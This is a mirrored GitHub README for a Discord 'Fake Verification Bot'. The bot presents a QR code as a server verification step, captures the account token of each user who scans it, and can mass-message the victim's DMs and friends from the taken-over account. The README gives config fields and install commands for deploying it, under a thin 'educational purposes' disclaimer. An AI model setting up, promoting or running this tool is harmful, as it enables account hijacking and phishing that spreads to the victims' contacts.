Giter Site home page Giter Site logo

fake-verify-bot-discord's Introduction

[Discord] - Fake Verification Bot (V1.0.0)

ADD VERIFICATION BOT TO YOUR SERVER (ONLINE 24/24)

astraadev

[Discord] - This Bot is a Script Gathering for Windows systems written in Python.

This Bot allows to create a verification QR Code, that the user will have to scan on his arrival on the server. Once scanned, you will get his information including his Token.

Disclaimer

Bot was made for Educational purposes
This project was created only for good purposes and personal use.
By using this Bot, you agree that you hold responsibility and accountability of any consequences caused by your actions.

Features

  • Async QR Code Management
  • Using Websockets (no browser used)
  • Personal QR Code (visible only to the person passing the verification)
  • Saves the information in a json file
  • Can gives a role to the user after his verification
  • Can send a message to all the user's DMs + all user's Friend
  • Possibility to define a logs channel
  • Easy to use + Intuitive UI (like my SelfBot)

How To Setup/Install

First of all please set your informations in the config.json file!

{
    "botToken": "BOT-TOKEN-HERE", #For more information, read below
    "logs_channel_id": "LOGS-CHANNEL-ID-HERE", #ID of the channel to which the bot logs will be sent
    
    "prefix": "PREFIX-HERE",
    "command_name": "COMMAND-NAME-HERE",
    
    "give_role": false, #Can take the value: true or false
    "role_name": "ROLE-NAME-HERE", #Name of the role you want to give to the user after scanning the QR Code
    
    "mass_dm": 0, #Can take the value: 0 (Disable), 1 (current user's dms), 2 (user's friends), 3 (Current DMs + Friends)
    "message": "MESSAGE-HERE" #Message you want to send to all user's DMs after scanning the QR code
}

Set up and invite your Bot.

  • Create a bot on the Discord Developer page
  • Enable all instances in the "Bot" tab
  • Invite your bot using this invite (replace CLIENTID by the ID of your Bot)

1st・Installation (Automated installation)

Launch the setup.bat file. A new file will be created. You will only have to launch it.

2nd・Installation (Manual installation)

$ git clone https://github.com/AstraaDev/Fake-Verification-Bot.git
$ python -m pip install -r requirements.txt
$ python main.py

Additional Informations

General Informations:

  • You can also add Verification Bot to your server. (online 24/24h)
  • If you have a problem, CLICK HERE to watch the YouTube video.
  • If you find any malfunction, contact me on Discord: Astraa#6100 or join my Discord Server.

Example

verification_example.png

Credits

Many thanks to RuslanUC for RemoteAuthClient and TurfuFrogy for developing the database part of the tool.

fake-verify-bot-discord's People

Contributors

0y9 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.